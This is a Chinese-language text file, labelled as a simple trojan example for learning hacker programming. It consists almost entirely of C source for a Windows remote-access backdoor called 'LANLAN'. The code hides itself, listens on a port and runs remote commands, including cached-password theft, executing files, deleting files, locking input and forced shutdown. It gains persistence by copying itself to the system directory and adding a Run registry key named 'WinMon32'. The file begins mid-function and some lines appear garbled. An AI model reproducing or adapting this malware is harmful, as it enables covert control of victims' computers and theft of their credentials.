一个简单木马例子.txt

可以对黑客编程有一定的了解

case DRIVE_REMOTE: 
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH); 
wsprintf(szBuff,"NetWork Disk: %s (%s)\n\n\r",szTemp,szFileSys); 
send(NewSock,szBuff,lstrlen(szBuff),0); 
break; 
} 
} 

} 

//--------------------------------------------------------------------------- 
// ExitWin 
// 关闭计算机(WIN 9X,NT/2000) 
//--------------------------------------------------------------------------- 

VOID WINAPI ExitWin() 
{ 
DWORD dwVer; 
HANDLE hProcess, hToken; 
TOKEN_PRIVILEGES NewState; 
DWORD ProcessId, ReturnLength = 0; 
LUID luidPrivilegeLUID; 

dwVer=GetOS(); 
if(dwVer==VER_PLATFORM_WIN32_WINDOWS) 
ExitWindowsEx(1,0); 

else if(dwVer==VER_PLATFORM_WIN32_NT) 
{ 
ProcessId = GetCurrentProcessId(); 
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId); 
OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken); 
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID); 

NewState.PrivilegeCount = 1; 
NewState.Privileges[0].Luid = luidPrivilegeLUID; 
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 

if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL)) 
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0); 
} 
} 

//--------------------------------------------------------------------------- 
// CtrlCD 
// 光驱控制 
//--------------------------------------------------------------------------- 

VOID WINAPI CtrlCD(HWND hWnd,BOOL Ctrl) 
{ 
switch(Ctrl) 
{ 
case TRUE: 
mciSendString("Set cdaudio door open wait",NULL,0,hWnd); 
break; 
case FALSE: 
mciSendString("Set cdaudio door closed wait",NULL,0,hWnd); 
break; 
} 
} 

//--------------------------------------------------------------------------- 
// PopMsg 
// 发送消息 
//--------------------------------------------------------------------------- 

VOID WINAPI PopMsg(LPCTSTR message,HWND hWnd) 
{ 
MessageBox(hWnd,message,"PopMsg",MB_OK); 
} 

//--------------------------------------------------------------------------- 
// ChangeDir 
// 改变当前目录 
//--------------------------------------------------------------------------- 

BOOL WINAPI ChangeDir(LPCTSTR szDir) 
{ 
if(SetCurrentDirectory(szDir)) 
return TRUE; 
else 
return FALSE; 
} 

//--------------------------------------------------------------------------- 
// GetCurPath 
// 得到当前目录 
//--------------------------------------------------------------------------- 

VOID WINAPI GetCurPath() 
{ 
TCHAR lpBuff[MAX_PATH]; 
TCHAR szTemp[MAX_PATH]; 

GetCurrentDirectory(MAX_PATH,lpBuff); 
wsprintf(szTemp,"CurrentDirect: %s\n\r",lpBuff); 
send(NewSock,szTemp,lstrlen(szTemp),0); 
} 

//--------------------------------------------------------------------------- 
// HSSys 
// 显示,隐藏桌面,任务栏 
//--------------------------------------------------------------------------- 

VOID WINAPI HSSys(HWND hWnd,BOOL Ctrl) 
{ 
switch(Ctrl) 
{ 
case FALSE: 
hWnd=FindWindow("Progman",NULL); 
ShowWindow(hWnd,SW_HIDE); 
hWnd=FindWindow("Sh*ll _TrayWnd",NULL); 
ShowWindow(hWnd,SW_HIDE); 
break; 
case TRUE: 
hWnd=FindWindow("Progman",NULL); 
ShowWindow(hWnd,SW_SHOW); 
hWnd=FindWindow("Sh*ll _TrayWnd",NULL); 
ShowWindow(hWnd,SW_SHOW); 
break; 
} 
} 

//--------------------------------------------------------------------------- 
// LockMK 
// 锁定鼠标,功能键 
//--------------------------------------------------------------------------- 

VOID WINAPI LockMK(BOOL Ctrl) 
{ 
RECT rc; 
switch(Ctrl) 
{ 
case TRUE: 
ZeroMemory(&rc,sizeof(rc)); 
ClipCursor(&rc); 
SystemParametersInfo(SPI_SCREENSAVERRUNNING,TRUE,NULL,0); 
SystemParametersInfo(SPI_SETFASTTASKSWITCH,TRUE,NULL,0); 
break; 
case FALSE: 
ClipCursor(NULL); 
SystemParametersInfo(SPI_SCREENSAVERRUNNING,FALSE,NULL,0); 
SystemParametersInfo(SPI_SETFASTTASKSWITCH,FALSE,NULL,0); 
break; 
} 
} 

//--------------------------------------------------------------------------- 
// ExeCommand 
// 执行命令 
//--------------------------------------------------------------------------- 

VOID ExeCommand(LPCTSTR szCommand,HWND hWnd) 
{ 
TCHAR szBuf[MAX_PATH]; 
TCHAR Param1[100]; 
TCHAR Param2[100]; 
int i; 

if((lstrcmp(szCommand,"getpw"))==0) 
GetCachePW(); 

else if((lstrcmp(szCommand,"getinfo"))==0) 
GetSysInfo(); 

else if((lstrcmp(szCommand,"gcpath"))==0) 
GetCurPath(); 

else if((lstrcmp(szCommand,"opencd"))==0) 
CtrlCD(hWnd,TRUE); 

else if((lstrcmp(szCommand,"closecd"))==0) 
CtrlCD(hWnd,FALSE); 

else if((lstrcmp(szCommand,"showsys"))==0) 
HSSys(hWnd,TRUE); 

else if((lstrcmp(szCommand,"hidesys"))==0) 
HSSys(hWnd,FALSE); 

else if((lstrcmp(szCommand,"lockmk"))==0) 
LockMK(TRUE); 

else if((lstrcmp(szCommand,"unlock"))==0) 
LockMK(FALSE); 

else if((lstrcmp(szCommand,"dproc"))==0) 
EnumProcess(); 

else if((lstrcmp(szCommand,"exitwin"))==0) 
ExitWin(); 

else if((strncmp(szCommand,"popmsg",lstrlen("popmsg")))==0) 
{ 
if(lstrlen(szCommand)<=lstrlen("popmsg")+2) 
{ 
send(NewSock,"usage : popmsg Message",28,0); 
} 
for(i=lstrlen("popmsg")+1;i<lstrlen(szCommand);i++) 
if(szCommand==‘ ‘)break; 
if(i==lstrlen(szCommand)) 
{ 
lstrcpy(Param1,szCommand+lstrlen("popmsg")+1); 
PopMsg(Param1,hWnd); 
} 
} 

else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0) 
{ 
if(lstrlen(szCommand)<=lstrlen("execfile")+2) 
{ 
send(NewSock,"usage : execfile szFileName",28,0); 
} 
for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++) 
if(szCommand==‘ ‘)break; 
if(i==lstrlen(szCommand)) 
{ 
lstrcpy(Param1,szCommand+lstrlen("execfile")+1); 
if(LoadProcess(Param1)==FALSE) 
send(NewSock,"execfile Fail",14,0); 
else 
send(NewSock,"execfile OK",11,0); 
} 
} 

else if((strncmp(szCommand,"cd",lstrlen("cd")))==0) 
{ 
if(lstrlen(szCommand)<=lstrlen("cd")+2) 
{ 
send(NewSock,"cd Drive\\Directory",19,0); 
} 
for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++) 
if(szCommand==‘ ‘)break; 
if(i==lstrlen(szCommand)) 
{ 
lstrcpy(Param1,szCommand+lstrlen("cd")+1); 
if(ChangeDir(Param1)==FALSE) 
send(NewSock,"Change Directory Fail",21,0); 
else 
send(NewSock,"Change Directory OK",19,0); 
} 
} 

else if((strncmp(szCommand,"dir",lstrlen("dir")))==0) 
{ 
if(lstrlen(szCommand)<=lstrlen("dir")+2) 
{ 
Dir("*.*"); 
} 
for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++) 
if(szCommand==‘ ‘)break; 
if(i==lstrlen(szCommand)) 
{ 
lstrcpy(Param1,szCommand+lstrlen("dir")+1); 
Dir(Param1); 
} 
} 

else if((strncmp(szCommand,"del",lstrlen("del")))==0) 
{ 
if(lstrlen(szCommand)<=lstrlen("del")+2) 
{ 
send(NewSock,"usage : DEL szFileName",28,0); 
} 
for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++) 
if(szCommand==‘ ‘)break; 
if(i==lstrlen(szCommand)) 
{ 
lstrcpy(Param1,szCommand+lstrlen("del")+1); 
Delete(Param1); 
} 
} 

else if((strncmp(szCommand,"copy",lstrlen("copy")))==0) 
{ 
if(lstrlen(szCommand)<=lstrlen("COPY")+2) 
{ 
send(NewSock,"usage : COPY Drive\\Filename ",28,0); 
return; 
} 
for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++) 
if(szCommand==‘ ‘)break; 
if(i==lstrlen(szCommand)) 
{ 
lstrcpy(Param1,szCommand+lstrlen("copy")+1); 
lstrcpy(Param2,""); 
send(NewSock,"Copy File1 to File2",19,0); 
} 
else 
{ 
lstrcpy(szBuf,szCommand); 
szBuf=0; 
lstrcpy(Param1,szBuf+lstrlen("copy")+1); 
lstrcpy(Param2,szBuf+i+1); 
Copy(Param1,Param2); 
} 
} 

else if((strncmp(szCommand,"ren",lstrlen("ren")))==0) 
{ 
if(lstrlen(szCommand)<=lstrlen("ren")+2) 
{ 
send(NewSock,"usage : REN Drive\\Filename ",28,0); 
return; 
} 
for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++) 
if(szCommand==‘ ‘)break; 
if(i==lstrlen(szCommand)) 
{ 
lstrcpy(Param1,szCommand+lstrlen("ren")+1); 
lstrcpy(Param2,""); 
send(NewSock,"Ren File1 to File2",19,0); 
} 
else 
{ 
lstrcpy(szBuf,szCommand); 
szBuf=0; 
lstrcpy(Param1,szBuf+lstrlen("ren")+1); 
lstrcpy(Param2,szBuf+i+1); 
Ren(Param1,Param2); 
} 
} 

else 
send(NewSock,"Bad Command !!!",16,0); 
} 

//--------------------------------------------------------------------------- 
// InitSocket 
// 初始化SOCKET 
//-------------------------------------------------------------------------- 

BOOL WINAPI InitSocket(HWND hWnd) 
{ 
if((WSAStartup(dwVersion,&wsaData))!=0) 
{ 
MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK); 
return FALSE; 
} 

CreateSock=socket(AF_INET,SOCK_STREAM,0); 
if(CreateSock==SOCKET_ERROR) 
{ 
closesocket(CreateSock); 
MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK); 
return FALSE; 
} 

Sock_in.sin_family=AF_INET; 
Sock_in.sin_port=htons(PORT); 
Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY); 

setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag)); 

if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR) 
{ 
closesocket(CreateSock); 
MessageBox(hWnd,"BIND ERROR",NULL,MB_OK); 
return FALSE; 
} 

else if(listen(CreateSock,3)==SOCKET_ERROR) 
{ 
closesocket(CreateSock); 
MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK); 
return FALSE; 
} 

else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR) 
{ 
closesocket(CreateSock); 
MessageBox(hWnd,"WSASelect ERROR",NULL,MB_OK); 
return FALSE; 
} 

addrlen=sizeof(SOCKADDR_IN); 


return TRUE; 
} 

//--------------------------------------------------------------------------- 

LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam) 
{ 

static TCHAR szCommand[dwComm]; 
static TCHAR szExec[dwComm]; 

switch(message) 
{ 
case WM_SOCKET: 
if(WSAGETSELECTERROR(lParam)) 
{ 
closesocket(wParam); 
break; 
} 

switch(WSAGETSELECTEVENT(lParam)) 
{ 
//连接 
case FD_ACCEPT: 
NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen); 
WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE); 
wsprintf(szCommand,"LANLAN Ver 1.0 Write by VIRUS\n\n\r%s",PROMPT); 
send(NewSock,szCommand,dwComm,0); 
break; 

//读取输入，如是回车则执行命令 
//不是将输入复制到缓冲区 
case FD_READ: 
ZeroMemory(szCommand,dwComm); 
recv(NewSock,szCommand,dwComm,0); 
if(szCommand[0]==VK_RETURN) 
{ 
wsprintf(szCommand,"\n\n\r%s",PROMPT); 
send(NewSock,szCommand,dwComm,0); 
ExeCommand(szExec,hWnd); 
ZeroMemory(szExec,dwComm); 
} 
else 
lstrcat(szExec,szCommand); 
send(NewSock,szCommand,dwComm,0); 
break; 

case FD_CLOSE: 
closesocket(wParam); 
break; 
} 
break; 

case WM_DESTROY: 
HideProc(UNSERVICE_PROC); 
PostQuitMessage(0); 
break; 

default: 
return DefWindowProc(hWnd,message,wParam,lParam); 

} 
return 0; 
} 

//--------------------------------------------------------------------------- 

WINAPI WinMain(HINSTANCE hInstance, HINSTANCE, LPSTR, int) 
{ 
HWND hWnd; 
MSG msg; 
WNDCLASS wndc; 
LPSTR szAppName="LANLAN"; 
HKEY hKey=0; 
DWORD disp=0; 
LONG lResult; 
TCHAR szKey[MAX_PATH]; 
TCHAR szSysDir[MAX_PATH+25]; 
TCHAR szFileName[MAX_PATH]; 


wndc.style=0; 
wndc.lpfnWndProc=WndProc; 
wndc.cbClsExtra=0; 
wndc.cbWndExtra=0; 
wndc.hInstance=hInstance; 
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION); 
wndc.hCursor=LoadCursor(NULL,IDC_ARROW); 
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1); 
wndc.lpszMenuName=NULL; 
wndc.lpszClassName=szAppName; 
RegisterClass(&wndc); 

hWnd=CreateWindow(szAppName,"LANLANServer", 
WS_OVERLAPPEDWINDOW, 
CW_USEDEFAULT,CW_USEDEFAULT, 
CW_USEDEFAULT,CW_USEDEFAULT, 
NULL,NULL,hInstance,NULL); 

ShowWindow(hWnd,SW_HIDE); 
UpdateWindow(hWnd); 
if(GetOS()==VER_PLATFORM_WIN32_WINDOWS) 
{ 
HideProc(SERVICE_PROC); 
} 
InitSocket(hWnd); 

//复制文件到系统目录 
//并加载注册表,自动运行 

GetSystemDirectory(szSysDir,MAX_PATH); 
lstrcat(szSysDir,RUN); 
GetModuleFileName(NULL,szFileName,MAX_PATH); 
CopyFile(szFileName,szSysDir,FALSE); 

lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"); 
lResult=RegCreateKeyEx(HKEY_LOCAL_MACHINE,szKey,0,NULL,REG_OPTION_VOLATILE, 
KEY_ALL_ACCESS,NULL,&hKey,&disp); 

if(lResult==ERROR_SUCCESS) 
{ 
lResult=RegSetValueEx(hKey,"WinMon32",0,REG_SZ,szSysDir,lstrlen(szSysDir)); 
RegCloseKey(hKey); 
} 


while(GetMessage(&msg,NULL,0,0)) 
{ 
TranslateMessage(&msg); 
DispatchMessage(&msg); 
} 

return (msg.wParam); 
}